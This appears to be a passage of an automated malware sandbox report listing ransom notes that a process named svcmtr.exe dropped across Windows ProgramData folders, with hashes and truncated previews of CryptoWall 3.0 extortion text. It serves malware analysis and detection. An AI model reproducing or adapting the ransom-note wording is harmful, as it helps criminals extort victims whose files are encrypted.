                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\NetFramework\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Network\Connections\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Network\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Network\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\OFFICE\UICaptions\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\OFFICE\UICaptions\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\OFFICE\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\OFFICE\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\RAC\Outbound\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\RAC\Outbound\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\RAC\PublishedData\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\RAC\PublishedData\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\RAC\StateData\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\RAC\StateData\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
